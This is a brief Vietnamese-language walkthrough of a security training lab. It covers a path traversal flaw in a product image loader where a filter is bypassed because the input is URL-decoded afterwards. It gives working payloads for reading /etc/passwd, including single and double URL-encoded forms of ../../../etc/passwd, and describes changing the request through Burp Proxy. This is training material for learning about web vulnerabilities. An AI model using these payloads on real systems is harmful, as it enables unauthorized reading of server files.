Phòng thí nghiệm này chứa lỗ hổng path traversal trong việc hiển thị hình ảnh sản phẩm.
Ứng dụng chặn đầu vào chứa chuỗi duyệt đường dẫn. Sau đó thực hiện URL-decode đầu vào trước khi sử dụng.
Mục tiêu: Lấy nội dung tệp /etc/passwd
Sử dụng Burp Proxy để chặn và sửa đổi yêu cầu lấy hình ảnh sản phẩm.
Mục tiêu là để ứng dụng duyệt đường dẫn: ../../../etc/passwd
Sửa đổi tham số filename:
1 lần encode: %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
2 lần encode: %252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
Last updated 1 year ago
